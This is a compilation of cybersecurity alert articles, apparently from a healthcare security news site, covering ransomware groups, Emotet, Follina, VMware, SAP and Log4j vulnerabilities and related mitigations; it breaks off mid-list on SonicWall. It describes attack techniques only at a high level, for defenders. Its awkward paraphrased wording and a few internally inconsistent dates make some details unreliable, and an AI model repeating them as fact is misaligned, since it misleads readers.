Category: Cybersecurity Alerts

The Federal Bureau of Investigation (FBI), Department of the Treasury, the Financial Crimes Enforcement Network (FinCEN), and Cybersecurity and Infrastructure Security Agency (CISA) have published a joint cybersecurity alert concerning the MedusaLocker ransomware.

The MedusaLocker threat group is found to run as a ransomware-as-a-service operation and utilizes affiliates to perform the attacks for around 55 – 60% of the ransom payments they bring in. MedusaLocker was earliest discovered in September 2019 and employed for attacking a vast array of targets in America.

Upon gaining access to victims’ networks, a batch file is utilized to implement a PowerShell script that distributes MedusaLocker all over the system. This is realized by modifying the EnableLinkedConnections value in the corrupted machine’s registry, which then permits the infected machine to identify linked hosts and networks through Internet Control Message Protocol (ICMP) and find shared storage using Server Message Block (SMB) Protocol.

MedusaLocker is going to stop the security, accounting, and forensic software program, reboot the machine using safe mode to keep the security application from sensing the ransomware, and then encrypt the data files. All files are encrypted besides those that are vital to the operation of the victims’ products. Typically, the ransomware also erases local backups and shadow copies and deactivates start-up recovery solutions.

Various vectors are utilized to get first access to systems, such as phishing and spam email strategies, with a few campaigns getting the ransomware payload directly connected to emails; nonetheless, definitely, the most typical way of attack is taking advantage of vulnerable Remote Desktop Protocol (RDP) controls.

Indicators of Compromise (IoCs) propagated as well as IP addresses, email addresses, Bitcoin wallet addresses, and TOR addresses are well-known to be employed by the group. Numerous mitigations were advised, the most crucial of which are to firstly remediate identified vulnerabilities, permit and utilize multifactor authentication, and offer training to personnel to guide them to identify and steer clear of attempts of phishing.

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has released an alert to the healthcare industry concerning the risk from Emotet malware. Emotet was initially discovered in 2014 and was originally a banking Trojan; nonetheless, the malware is now updated and includes new features. Besides working as a banking Trojan, the malware has a dropper for sending other variants of malware and is provided to other cybercriminal organizations as an infrastructure-as-a-service (IaaS) model. Attackers use Emotet to send a selection of malware variants such as IcedID, Qbot, Trickbot, Azorult, and ransomware payloads like BitPaymer and Ryuk.

As per Europol, Emotet is the most threatening malware variant worldwide infecting one in five companies. Information from Malwarebytes shows that 80% of malware attacks at healthcare companies used Trojans, most commonly Emotet. Europol thinks that Emotet is the most harmful malware used today.

In late 2020, an international law enforcement operation targeted the MUMMY SPIDER threat group, which operates Emotet. Several cybersecurity organizations from Canada, the U.S., and Europe were successful in taking down the Emotet infrastructure in January 2021 and eradicating the disabled malware from affected systems in April 2021.

Although Emotet activity was halted, not long after the MUMMY SPIDER started restoring the botnet. Last November 2021, security experts identified new Emotet activity when the botnet was being rebuilt. As per HC3, the current command-and-control infrastructure of Emotet contains 246 systems (and increasing), and the updated malware has an improved dropper and different loader. The number of attacked devices is increasing at an unbelievable rate.

Emotet malware is mostly transported via email, in most cases through malicious Office attachments or links that go to unsecure websites where the payload is downloaded. Sometimes, Emotet is also delivered through brute force attacks and when exploiting vulnerabilities. According to Proofpoint, the tactics, techniques, and procedures (TTPs) were updated and new means of delivery are being tested, such as emails with links to OneDrive. These new strategies are being tested in small campaigns to check their success and may be used in bigger campaigns. Proofpoint additionally states that the threat group could have altered tactics and may keep on doing more restricted attacks on chosen targets.

Emotet can hijack email threats, self-propagate, and inserts a duplicate of itself into the emails that are mailed to contacts. This means of distribution is very useful, as the emails circulating the malware are from popular and trustworthy sources, which raises the odds of the attachments being viewed. In January, malware was discovered distributing Cobalt Strike onto attacked systems.

The best strategy to block attacks is to employ layered protection. HC3 has given an evaluation of the malware and the TTPs being used for sending the malware in the threat alert. There are also recommended consulting government resources and proposed mitigations.

Microsoft has published a security notification and has presented a workaround to stop a zero-day vulnerability found in the Microsoft Windows Support Diagnostic Tool (MSDT) from being taken advantage of.

The vulnerability is being tracked as CVE-2022-30190 and has been referred to as Follina by security researchers. As reported by Microsoft, there is a remote code execution vulnerability when MSDT is called utilizing the URL protocol from a calling application like Word.

During the weekend, security researcher nao_sec discovered a Word document that was using remote templates to carry out PowerShell commands on selected systems via the MS-MSDT URL protocol system. In a new blog post, security expert Kevin Beaumont stated that Microsoft Defender does not see the documents as malicious, and detection using antivirus tools is poor because the documents used to exploit the vulnerability do not include any malicious code. Instead, they take advantage of remote templates to obtain an HTML file from a remote server, enabling an attacker to execute malicious PowerShell commands.

The majority of email attacks that utilize attachments for delivering malware require that macros are enabled; nonetheless, the vulnerability may be exploited although macros are disabled. The vulnerability is leveraged when the file attachment is opened. Beaumont additionally revealed that zero-click exploitation can be done whenever an RTF file is utilized, as the vulnerability could be exploited with no need to open the document through Explorer’s preview tab.

Microsoft mentioned when an attacker successfully exploits the vulnerability, malicious code may be implemented with the privileges of the calling program. It would enable an attacker to install programs, view, modify, remove data, or create new accounts in the context permitted by the user’s rights. The vulnerability could be exploited in all Office versions starting 2013, which include the current version of Office 365.

The vulnerability was at first reported to Microsoft in April and the vulnerability was given a high severity CVSS score of 7.8 out of 10 since Microsoft did not take into account the Follina vulnerability to be critical. Microsoft has already given a workaround and instruction 
that requires deactivating the MSDT URL Protocol until eventually, a patch is available. Quick action is needed to avoid the exploitation of the vulnerability. Vulnerabilities that may be taken advantage of using Office are quickly used by threat actors, particularly when they could be exploited with macros deactivated.

Various threat actors are identified to be exploiting the vulnerability, such as the Chinese threat actor TA413, as per Proofpoint. Palo Alto Networks Unit 42 team stated that according to the quantity of publicly available information, the simplicity of use, and the great effectiveness of this exploit, Palo Alto Networks highly proposes sticking to Microsoft’s guidance to safeguard your enterprise until a patch is released to correct the problem.

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) included 75 additional vulnerabilities in the Known Exploited Vulnerability Catalog. This catalog is a listing of vulnerabilities identified in software programs and operating systems that are found to have been taken advantage of in real-world attacks. The catalog currently contains 737 vulnerabilities.

The most recent inclusions were added in three groups: 21 on Tuesday, 20 on Wednesday, and 34 on Thursday. As per the Binding Operational Directive (BOD) 22-01, every Federal Civilian Executive Branch (FCEB) agency must search for the vulnerabilities and make certain to apply the patches or mitigate the vulnerabilities in a period of two weeks.

Almost all the vulnerabilities included in the list last week aren’t new vulnerabilities. In many instances, patches were launched to deal with the vulnerabilities a few years ago and in certain instances, the vulnerabilities were openly revealed 12 years back. A few of the vulnerabilities have an effect on items that have already reached their end-of-life, for instance, Virtual System/Server Administrator (VSA), Adobe Flash Player, InfoSphere BigInsights and Microsoft Silverlight. In case those solutions continue to be installed or used, the products must be removed or disconnected.

The latest vulnerabilities consist of CVE-2022-20821, a Cisco IOS XR open port vulnerability, and CVE-2021-30883, a memory corruption vulnerability identified in several Apple products, and two vulnerabilities found in the Android Kernel: CVE-2021-1048, a use-after-free vulnerability, and CVE-2021-0920, a race condition vulnerability.

The vulnerabilities have an effect on items from these companies: Adobe, Apple, Android, Artifex, Cisco, IBM, Google, Kaseya, Linux, Microsoft, Meta Platforms, Mozilla, QNAP, Oracle, Red Hat, and WebKitGTK.

Although BOD 22-01 is just applicable to FCEB agencies, CISA urges all companies to minimize their exposure to cyberattacks by making sure to remediate the vulnerabilities included in the Known Exploited Vulnerability Catalog in a prompt manner in accordance with their vulnerability management tactics.

The Cybersecurity and Infrastructure Security Agency (CISA) released an emergency directive to all federal bureaus, necessitating them to do something to deal with two vulnerabilities in selected VMware products that are potentially quickly taken advantage of in the wild, and two earlier vulnerabilities in VMWare that were unveiled in April which are being taken advantage of by several threat actors, such as the Advanced Persistent Threat (APT) actors.

The most recent vulnerabilities, monitored as CVE-2022-22973 (high severity) and CVE-2022-22972 (critical), and the two vulnerabilities identified in April impact five VMWare products:

• VMware Workspace ONE Access (Access) Appliance
• VMware vRealize Automation (vRA)
• vRealize Suite Lifecycle Manager
• VMware Identity Manager (vIDM) Appliance
• VMware Cloud Foundation

CVE-2022-22972 is a vulnerability involving authentication bypass impacting VMware Workspace ONE Access, Identity Manager, and vRealize Automation that has an effect on users of local domains. When a malicious actor gets network access to the UI, the vulnerability may be taken advantage of to acquire admin access with no authentication. The vulnerability was given a CVSS severity rating of 9.8 of 10.

CVE-2022-22973 is a vulnerability involving local privilege escalation in VMware Workspace ONE Access and Identity Manager having a CVSS severity rating of 7.8. When a malicious actor got local access, the vulnerability may be taken advantage of to elevate privileges to root. The two vulnerabilities likewise impact vRealize Suite Lifecycle Manager and VMware Cloud Foundation.

The two vulnerabilities identified to have been taken advantage of in the wild are monitored as CVE 2022-22960 (high severity) and CVE 2022-22954 (critical). CISA states the two vulnerabilities were taken advantage of in real-world attacks, independently and together, by several threat actors.

CVE 2022-22954 is a code injection vulnerability having a CVSS rating of 9.8 that impacts VMware Workspace ONE Access and Identity Manager products. Taking advantage of the vulnerability enables threat actors to activate server-side template injection that could result in remote code execution. CVE 2022-22960 involves an inappropriate privilege management problem having a CVSS rating of 7.8 that impacts VMware Workspace ONE Access, Identity Manager, and vRealize Automation products, and enables threat actors to elevate privileges to root.

In a single attack, a threat actor having system access to the web interface took advantage of CVE 2022-22954 to perform a shell command as a VMWare user, then took advantage of the second vulnerability to elevate privileges to root. Right after taking advantage of the two vulnerabilities, the threat actor can move sideways to other networks, elevate permissions, and erase records. In a different situation, a threat actor used the Dingo-J-spy web shell right after taking advantage of the vulnerabilities. The two April vulnerabilities’ exploits were created by reverse-engineering the patches launched by VMWare. At this time patches were launched to fix the most recent two vulnerabilities, in the same way, quick exploitation of the vulnerabilities in the wild may be needed.

Although the emergency directive is merely applicable to Federal bureaus, all companies that are utilizing vulnerable VMWare products ought to patch right away or carry out the advised mitigations. The due dates for Federal organizations to finish the needed activities are May 23 to 24, 2022.

The Five Eyes intelligence alliance, which is composed of cybersecurity companies from the U.K., U.S.A., New Zealand, Canada, and Australia, has released a joint advisory warning regarding the growing number of cyberattacks directed at managed service providers (MSPs).

MSPs are interesting targets for cybercriminals and nation-state threat actors. A lot of companies depend on MSPs to provide information and communication technology (ICT) and IT infrastructure services since it is usually less difficult and cheaper than creating the capabilities to take care of those functions internally.

So as to deliver those services, MSPs require reliable connectivity and privileged access to the systems of their customers. Cyber threat actors attack vulnerable MSPs and utilize them as the first access vector to obtain access to the networks of all firms and organizations that they support. It is a lot easier to carry out a cyberattack on a vulnerable MSP and acquire access to the sites of several businesses than to target those organizations directly.

If MSP systems are compromised, it may take a few months before detecting the intrusion. During that time, attackers may do cyber espionage on the MSP and its clients or get ready for other follow-on activities like ransomware attacks.

The Five Eyes agencies give advice for baseline security steps that MSPs and their clients ought to carry out and additionally recommend customers to evaluate their agreements with MSPs to make sure that the contracts indicate that their MSPs should implement the recommended procedures and controls.

Steps must be taken to enhance defenses to stop the initial compromise. Cyber threat actors generally exploit vulnerable devices and Internet-facing services and perform phishing and brute force attacks to obtain a foothold in MSP systems. The Five Eyes agencies encourage MSPs and their users to:

• Enhance the security of vulnerable devices
• Secure internet-facing solutions
• Protect against brute force and password spraying
• Protect against phishing

It is essential to activate or strengthen monitoring and logging processes to permit intrusions to be quickly discovered. Because attackers may compromise sites for months, all companies must keep their most crucial logs for about six months. The agencies in the alert suggest whether via a detailed security information and event management (SIEM) solution or discrete recording tools, apply and maintain a segregated logging regime to identify threats to sites.

It is essential to secure remote access applications and enforce multi-factor authentication as much as possible and ensure MFA is executed on all accounts that permit access to customer environments. Clients of MSPs ought to make certain that their contracts express that MFA ought to be utilized on accounts that are employed to get access to their systems.

The Five Eyes agencies additionally advise

• Handling internal architecture threats and segregating internal networks
• Deprecating outdated accounts and facilities
• Using the principle of least privilege
• Implementing software updates and patches quickly
• Creating and executing incident response and recovery plans
• Backing up systems and information on a regular basis and evaluating backups
• Understanding and proactively controlling supply chain risk
• Handling account authentication and authorization
• Promoting transparency

MSPs and their consumers will have unique environments, therefore the advice must be utilized as appropriate according to their particular security needs and rules.

The tactics, techniques, and procedures (TTPs) utilized by ransomware and other cyber threat actors are continually evolving to avert identification and let the groups carry out more successful attacks. The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has assessed and shared the TTPs used in the 1st Q of 2022.

In Q1 of 2022, most of the ransomware attacks on the Healthcare and Public Health Sector (HPH) were carried out by five ransomware-as-a-service groups. The LockBit 2.0 and Conti ransomware groups were responsible for 31% of attacks, followed by SunCrypt (16%), ALPHV/BlackCat, and Hive (11% each). The financially motivated threat groups FIN7 and FIN12 have also altered their activities and have moved to ransomware operations, with FIN7 working with ALPHV and FIN12 substantially involved in attacks on the HPH segment. FIN12’s participation has lowered the timescale for performing attacks from 5 days to 2 days.

Ransomware gangs frequently work with initial access brokers (IABs) that concentrate on getting access to companies’ networks, then sell the access to the ransomware groups. Using IABs helps ransomware gangs focus on making their ransomware variants and operating their RaaS campaigns, which enables them to focus on their TTPs and perform attacks that succeed. HC3 did not observe any transformation in the numbers of IABs working with ransomware groups in Q1 of 2022, with the same numbers observed throughout 2022.

IABs were most often found promoting general VPN/RDP access to the systems of HPH entities on cybercrime discussion boards, which is more than 50 percent of forum advertisements, and about 25% of ads were promoting compromised Citrix/VPN appliances. Organizations broadly implemented remote access solutions to help a remote labor force for the duration of the COVID-19 pandemic, however the rush to deploy meant non-implementation of standard security features, and extensive exploitation of vulnerabilities.

Ransomware gangs are more and more making use of living-of-the-land (LOTL) strategies in their attacks, employing genuine tools that are already accessible in the settings of large firms during ransomware attacks like Task Scheduler, CMD.exe, PowerShell, Sysinternals, MSHTA. The usage of these tools helps the gang’s malicious activities harder to identify.

Tactics consist of using

• remote access tools such as Atera, AnyDesk, Windows Safe Mode, ManageEngine, ScreenConnect
• encryption tools like DiskCryptor, and BitLocker
• file transfer tools such as FileZilla FTP,
• Microsoft Sysinternals tools for instance Procdump, Dumpert, and PsExec
• open-source tools like Cobalt Strike, Mimikatz, Process Hacker, AdFind, and MegaSync.

Although the malicious use of these tools is hard to identify by security groups, there are discovery opportunities. HC3 suggests utilizing a behavior-based strategy to detect, for example a Security Information and Event Management (SIEM) tool, which can discover malicious usage of LOTL tools which signature-based recognition tools cannot.

Read the HC3 Ransomware Trends in the HPH Sector Report on this page.  It gives comprehensive information regarding the TTPs utilized by each ransomware operation, which includes the most frequently abused LOTL tools, appropriate ATT&CK strategies, and a long list of mitigations that could be enforced to avoid, find, react to, and recover from ransomware attacks.

The Cybersecurity and Infrastructure Security Agency (CISA) has lately released a fact sheet about cyber threat facts sharing to help organizations in reporting incidents of cyberattacks, which will enable the agency to minimize present and surfacing cybersecurity threats to critical infrastructure in the U.S.

After the approval of the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA), a rulemaking process will start to carry out statutory specifications; nevertheless, the fact sheet works as a temporary measure to instruct companies on the voluntary sharing of data concerning cyber-connected events.

The sharing of cyber threat facts is an important component of the collective protection against cyber threats and serves to reinforce U.S. cyber defense. The quick sharing of threat data with CISA enables it to give timely alerts and offer help to other companies and entities that can allow them to prevent becoming victims to identical attacks. With access to threat data, CISA can recognize attack patterns that will direct future initiatives to secure the critical infrastructure of the country.

The fact sheet details how companies can help and the types of action and data that ought to be provided. Organizations must monitor attacks, take action to minimize the threat, and then submit a threat report to CISA. CISA has asked for threat data from critical infrastructure operators and
owners and federal, state, territorial, local, and tribal government partners.

CISA would like to get cyber threat data associated with unauthorized system access, DOS attacks lasting over 12 hours, the identification of malicious code inside systems, targeted and frequent systems scans, repeated efforts of unauthorized persons to access systems, email or mobile communications related to phishing attempts or successful phishing attacks, and ransomware attacks on critical infrastructure companies.

CISA stated the information given will enable it to fill critical data gaps, use resources, evaluate trends, give alerts, and create common knowledge of how attackers are targeting U.S. systems and critical infrastructure areas.

Becton, Dickinson and Company (BD) submitted a report about two vulnerabilities found in its BD Pyxis automatic medication dispensing systems, BD Viper LT automatic molecular testing systems, and BD Rowa pouch packaging systems.

The two vulnerabilities are caused by using hard-coded credentials. When exploited, the vulnerabilities can permit an unauthorized person to access, change, and erase sensitive information, which can consist of electronic protected health information (ePHI).

The most critical vulnerability, monitored as CVE-2022-22765, impacts all BD Viper LT system versions beginning 2.0. The vulnerability was given a CVSS severity rating of 8.0 of 10.

BD is fixing the vulnerability at this time and will include the fix in the forthcoming release of the BD Viper LT system Version 4.80 software. Meanwhile, BD has recommended using compensating settings, for instance making sure physical access controls are set up, enabling authorized people only to get system access, not connecting the system to the network wherever possible, and in case it isn’t feasible to remove the system from network access, to employ industry-standard network security guidelines and procedures.

The second vulnerability monitored as CVE-2022-22766, impacts the BD Pyxis selection of products as well as BD Rowa Pouch Packaging Systems. The vulnerability was given a CVSS severity rating of 7.0 of 10. In case exploited, an attacker can get access to the file system and take advantage of software files that can be employed to decrypt software credentials or acquire access to ePHI.

Credentials are managed by BD and customers cannot view or used them to get access or utilize BD Pyxis devices. So to be able to take advantage of the vulnerability, threat actors need to get access to the hardcoded credentials, compromise a facility’s system, and acquire access to each device.

BD stated it is fortifying credential management features in BD Pyxis devices. At the same time, compensating controls may be used on the impacted items. These consist of restricting physical access to approved personnel, firmly managing the BD Pyxis system credentials given to approved users, separating items in a protected VLAN or behind firewalls, and keeping track of and recording network traffic. The Pyxis Security Module for automatic patching and management of virus definition is furnished to all accounts. Users must support their BD support group to make sure to update all patching and virus definitions.

BD wants transparency with its clients and makes product security data, which includes vulnerability disclosures, accessible via the BD Cybersecurity Trust Center. As part of this responsibility, BD published product security notices regarding the usage of hardcoded credentials. Customers or end-users do not use hardcoded credentials directly to acquire access to these systems.

There was no report of vulnerabilities exploitation in clinical environments. BD reported the vulnerabilities to the ISAOs, FDA, and CISA to bring up awareness.

The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has given an advisory to the U.S. health sector regarding probable cyber threats that can spillover from the conflict and affect U.S. healthcare providers.

HC3 mentioned the HHS is not aware of any particular threats to the Health and Public Health (HPH) Segment; nonetheless, it is obvious that allies on both sides of the clash have cyber capabilities and there are concerns that there may be cyberattacks on the HPH segment due to the conflict.

HC3 has warned that threats can originate from three sources: Threat actors connected with the Russian government, threat actors associated with the Belarussian government, and cybercriminal groups operating beyond Russia and its nearby states. There is also potential for other cybercriminal gangs to either become involved in the clash or take advantage of the conflict to carry out non-related cyberattacks.

Russia has for many decades been a cyber power on the planet. Going back to the Moonlight Maze attacks on the US Department of Defense in the 1990s, Russian state-sponsored actors were thought to be responsible for some of the most advanced cyberattacks publicly disclosed. Particularly, they are identified to strike adversarial critical infrastructure to further their geopolitical ambitions.

There are additionally very capable cybercriminal groups that operate outside of Russia or have expressed their support for Russia, which include the group behind the Conti Ransomware. The Conti ransomware gang, which is extensively considered to have likewise operated Ryuk ransomware, has extensively targeted the healthcare industry in the U.S. The Conti ransomware group is engaged in big game hunting, multi-stage attacks, and targets managed service providers (MSPs) and their downstream customers. The Conti ransomware gang engages in double and triple extortion, exfiltrating information prior to encryption and then threatens to post the data and alert partners and shareholders when no ransom payment is made.

HC3 thinks that the Conti ransomware group and/or other cybercriminal groups may either participate in the conflict or exploit the conflict for financial benefit. The threat group referred to as UNC1151 is thought to engage in the Belarussian military and has apparently been doing phishing campaigns focused on Ukrainian troops in January, and the Whispergate Wiper was utilized in cyberattacks in Ukraine, which were linked to Belarus.

Whispergate is one of three variants of wiper malware that were recently identified. These variants of wiper malware utilize ransomware as a lure and drop ransom notes that state files were encrypted; nevertheless, the master boot record is destroyed rather than encrypted and there is no way for recovery.

One more wiper called HermeticWiper was employed in attacks in Ukraine beginning February 24, 2022, of which a number of variants have to date been discovered. ESET has lately discovered another wiper which the company named IsaacWiper, is presently investigating.

Although attacks using these malware variants are now targeted in Ukraine, in 2017, NotPetya wiper malware was utilized in targeted attacks in Ukraine and was sent through compromised tax software, yet attacks involving the malware propagated worldwide and affected multiple healthcare companies in the United States.

All companies in the HPH segment are ardently cautioned to follow an increased state of vigilance, do something to boost their defenses, and evaluate CISA guidance on mitigations and enhancing resilience to cyberattacks.

The U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center has given a threat alert warning about the threats relevant to electronic health record systems, which are normally attacked by cyber threat actors.

Cyberattacks on EHRs may be really rewarding for cyber threat actors. EHRs normally comprise all the records necessary for various types of fraudulence, which include names, dates of birth, addresses, government and state ID, Social Security numbers, health information, and health insurance details. No other database has such a large selection of data. The details covered in the systems have a big price on the black market and may be effortlessly bought by cybercriminals who are known for identity theft, tax, and insurance fraudulence. Malware, and particularly ransomware, cause considerable danger to EHRs. Ransomware could be utilized to encrypt EHR information to prevent access, which brings about issues to medical services and produces patient safety problems, which raises the chances of the ransom being compensated. Phishing attacks to obtain access to the credentials essential to access EHRs are likewise well-known.

A cybersecurity tactic ought to be made to secure against malware and ransomware attacks. Malware and ransomware attacks frequently start off with phishing emails, therefore email security alternatives ought to be enforced, and end-users need to acquire training to help them distinguish phishing emails plus other email threats. Providing the workforce with regular security awareness training may increase resistance to cyberattacks that aim at workers, who are weak links in the safety chain. Attacks on Remote Desktop Protocol (RDP) are likewise popular. Consider employing a VPN solution to avoid exposing RDP. Threat actors usually take advantage of unpatched vulnerabilities, thus it is important to patch immediately and to prioritize patching to tackle critical vulnerabilities first, specifically vulnerabilities that are identified to have been taken advantage of in cyberattacks. The Cybersecurity and Infrastructure Security Agency (CISA) has a Known Exploited Vulnerabilities Catalog that could advise IT, security teams, on putting patching efforts first.

Numerous healthcare companies encrypt EHR files. Encryption secures data files while it is copied between on-site users and external cloud software, nevertheless, there can be blind spots in encryption that may be used by threat actors to keep away from being seen while they implement their attack. Cloud providers are currently usually employed by healthcare institutions, such as cloud-hosted EHRs. All information sent to cloud services needs to be adequately safeguarded to stick to HIPAA. Cloud access security broker solutions can be helpful regarding this.

Steps should be taken to avert attacks by outside cyber threat actors, however, there are at the same time internal threats to EHR records. Healthcare personnel are given access to EHRs and could readily abuse that access to see or steal patient information. Personnel must get training on internal guidelines with regards to EHR use and data access and how HIPAA discourages the unauthorized accessing of information. The sanctions policy ought to be spelled out together with the likelihood for criminal charges for unauthorized access of medical data. Administrative guidelines must be applied to make it challenging for staff to access information without authorization and policies for EHR must be enforced.

There ought to be monitoring of physical and system access, audits must be continually done to distinguish unauthorized access, and device and media management must be put in place to stop the unauthorized replicating of EHR data. An endpoint hardening strategy must additionally be established that comprises a number of layers of security on all endpoints. The strategy will furthermore make certain that any breach is noticed and contained before attackers may acquire access to EHRs and patient files.

Healthcare companies must participate in threat hunting to discover threat actors who have bypassed the protection perimeter and gained access to endpoints. Penetration testers need to be utilized for ‘Red Team’ activities involving the tradecraft of hackers to discover and exploit vulnerabilities. Cybersecurity experts ought to also be involved in the Blue Team, which is occupied with directing the IT security team on developments to avoid sophisticated cyberattacks.

There are appreciable advantages that are derived from EHRs, however, risks to information should be appropriately managed. The HHS advises healthcare leaders to modify their goals from prevention to the formation of a proactive readiness plan to fully fully grasp vulnerabilities in their EHRs and then use a framework that will be useful at identifying and preventing attacks.

The German business software firm SAP has launched patches to correct a set of critical vulnerabilities that impact SAP applications that utilize the SAP Internet Communications Manager (ICM). Researchers at Onapsis Research Labs identified the vulnerabilities, which were called the vulnerabilities ICMAD (Internet Communications Manager Advanced Desync). All three vulnerabilities can be exploited to gain remote code execution, which would permit remote attackers to fully breach vulnerable SAP programs.

The vulnerabilities have an effect on the following SAP software:

SAP NetWeaver AS ABAP
SAP Web Dispatcher
SAP Content Server 7.53
ABAP Platform
SAP NetWeaver AS Java

The vulnerabilities may be taken advantage of to steal victim sessions and credentials in plain text, modify the behavior of programs, acquire PHI and sensitive business data, and cause denial-of-service. CVE-2022-22536 is the most severe vulnerability of the three and was given the maximum CVSS severity score of 10/10. Onapsis stated that an unauthenticated attacker could quickly exploit the vulnerability on SAP programs in the default configuration by sending a request via the frequently exposed HTTP(S) service.

Whenever business software allows HTTP(S) access, the most frequent configuration is for an HTTP(S) proxy to be sitting between clients and the backend SAP system, and this setting permits the vulnerability to be exploited. The second vulnerability, tracked as CVE-2022-22532 (CVSS 8.1) may also be exploited in this configuration, and also in the absence of proxies. The third vulnerability monitored as CVE-2022-22533 (No CVSS score yet) could likewise result in remote code execution.

The vulnerabilities were discovered while studying HTTP smuggling strategies, which the researchers learned may be leveraged utilizing requests that closely reflect genuine HTTP requests. Therefore, these attacks will be hard for security teams to identify. Additionally, the vulnerabilities are really easy to exploit.

SAP applications are substantially utilized by businesses, which include the healthcare sector. When vulnerabilities are found, hackers can quickly exploit them to obtain access to programs to steal information or cripple business systems. Quite often, the first exploits of SAP vulnerabilities happen within 72 hours of releasing patches.

SAP applications are employed to manage business processes and in healthcare, the applications frequently consist of protected health information (PHI). Vulnerabilities in SAP software could for that reason be exploited to steal patient information.

SAP and Onapsis have advised all companies employing vulnerable SAP applications to use the patches right away to avoid exploitation. The Cybersecurity and Infrastructure Security Agency (CISA) has additionally issued an alert regarding the vulnerabilities urging prompt patching. Firms need to prioritize patching affected systems that are open to untrusted networks, like the Internet. Onapsis has introduced a free, open-source scanning tool that businesses can use to discover if they are prone to ICMAD exploits.

The healthcare industry will continually deal with a substantial selection of threats. Ransomware attacks and data breaches remain very rampant. In 2021, healthcare data breach reporting recorded a rate of around 2 each day, and although there was a decrease in the number of ransomware attacks in comparison to 2020, ransomware continues to be a significant threat with a number of ransomware gangs actively targeting the healthcare industry.

In the 4th Q, 2021 Healthcare Cybersecurity Bulletin , published on January 21, the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) notified of a number of continuing cyberattack trends that are likely to carry on in Quarter 1 of 2022.

Ransomware

Law enforcement institutions in the United States and Europe have heightened their initiatives to bring the operators of ransomware operations and their affiliates to justice, with those campaigns resulting in the arrests of key members of various ransomware groups. This year, in an unusual act of cooperation between the U.S. and Russia, 14 suspected members of the infamous REvil ransomware gang have been apprehended. The elevated pressure on ransomware groups has helped to control attacks, however, there continue to be many ransomware gangs in operation, many of which were actively attacking the healthcare industry.

Emsisoft logged 68 ransomware attacks on healthcare providers in 2021, which is a decline from the 80 healthcare companies attacked in 2020; nevertheless, there were additionally a number of attacks on business associates that have affected several healthcare companies. Based on a current FinCEN report, there are a minimum of 68 active ransomware operations, and the 10 leading ransomware groups in 2021 made over $5.2 billion in ransom payments. Ransomware will remain a dilemma for the healthcare market in 2022, therefore it is essential to adhere to industry best practices to prepare for, avoid, and recover from ransomware attacks to make sure patient safety.

Apache Log4J

The vulnerabilities discovered in the Apache Log4J logging library, which was first made known to the public in the latter part of November 2021, continue to create problems for healthcare institutions. A proof-of-concept exploit was introduced in December 2021, and a number of threat actors were exploiting the vulnerabilities. HC3 gave a threat report on January 20, 2021, cautioning about the threat of exploitation of the 6 vulnerabilities and recommended mitigations that ought to be enforced right away to minimize the danger of exploitation.

Emotet Botnet

Emotet malware at first appeared in 2014 and was broadly employed in attacks on healthcare companies. Devices infected with the Emotet Trojan are put into the botnet, and access to those gadgets is sold to other threat gangs, frequently bringing about ransomware attacks. The botnet was taken out in January 2021, which is a component of the reason why there is a decline in ransomware attacks; nonetheless, the botnet is right now being rebuilt with greater resilience to takedown efforts and currently has various new capabilities. Emotet is most likely to present a substantial threat to the healthcare market in 2022 thus it is crucial to do something to enhance defenses. Emotet is mainly distributed through phishing emails, and so healthcare institutions must utilize robust email security steps and make certain they offer security awareness training to the employees.

Vulnerabilities

Vulnerabilities in information systems can be exploited to obtain access to healthcare networks and sensitive data. It is crucial for healthcare providers to be on top of patching and to utilize software updates immediately. Patching must be prioritized, with the vulnerabilities stated in the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities Catalog dealt with first, together with any critical vulnerabilities in software programs, operating systems, and firmware.

The original vulnerability identified in Log4j (CVE-2021-44228) that shocked the world because of its seriousness, simplicity of exploitation, and the magnitude to which it affects software and cloud solutions, isn’t just the vulnerability existing in the Java-based logging utility.

Following the release of version 2.15.0 to correct the vulnerability, it was confirmed that version 2.15.0 continued to be vulnerable in particular non-default configurations because of an unfinished patch. The latest vulnerability is monitored as CVE-2021-45046 and was resolved in version 2.16.0 of Log4j. At first, the low severity vulnerability was given a CVSS score of 3.7; but, the severity score has gone up to critical (CVSS 9.0), considering that while this vulnerability was documented as a denial-of-service bug at first, it was eventually established that it can be taken advantage of to permit data exfiltration as well as remote code execution.

As per Apache, “If the logging configuration utilizes a non-default Pattern Layout having a Context Lookup (for instance, $${ctx:loginId}), attackers that can control the Thread Context Map (MDC) input information could create malicious input data that consists of a recursive lookup, leading to a StackOverflowError that may shut down the process.

Apache highly recommended that companies need to upgrade once more to version 2.16.0 to avoid the exploitation of the latest vulnerability; nevertheless, another vulnerability has already been discovered, which is monitored as CVE-2021-45105. The new vulnerability is a DoS bug with a CVSS score of 7.5 (high severity) and impacts all versions of Log4j including 2.0-beta9 up to 2.16.0.

Based on the Apache Software Foundation (ASF), Apache Log4j2 from versions 2.0-alpha1 up to 2.16.0 failed to secure uncontrolled recursion from self-referential queries. If the logging settings utilize a non-default Pattern Layout having a Context Lookup (for instance, $${ctx:loginId}), attackers that can control the Thread Context Map input information could create malicious input information that includes a recursive query, causing a StackOverflowError that is going to shut down the process.

CVE-2021-45105 is already resolved in version 2.17.0, which is the 3rd version of Log4j that will be available in 10 days. More details on the Log4j vulnerabilities along with the most recent updates are available on this page.

SonicWall has introduced new software for its Secure Mobile Access (SMA) 100 series remote access appliances that resolves 8 vulnerabilities consisting of two critical and four high-severity vulnerabilities.

Threat actors are taking advantage of vulnerabilities in SonicWall appliances in past times in ransomware attacks. Though there are no identified incidents of exploiting the most current batch of vulnerabilities in the wild at the moment, there is a huge risk of these vulnerabilities being used in case the firmware is not updated on time. The SMA 100 series appliances affected by the vulnerabilities include the SonicWall SMA 210, 200, 410, 400, and 500v secure access gateway items.

The most critical vulnerabilities are buffer overflow problems which an unauthenticated attacker may take advantage of remotely to implement code on unsecured devices. These are

• CVE-2021-20045 has a CVSS score of 9.4. It covers a number of unauthenticated file explorer heap-dependent and stack-based buffer overflow issues.
• CVE-2021-20038 has a CVSS score of 9.8. It is an unauthenticated stack-based buffer overflow vulnerability

The 4 high severity vulnerabilities are the following:

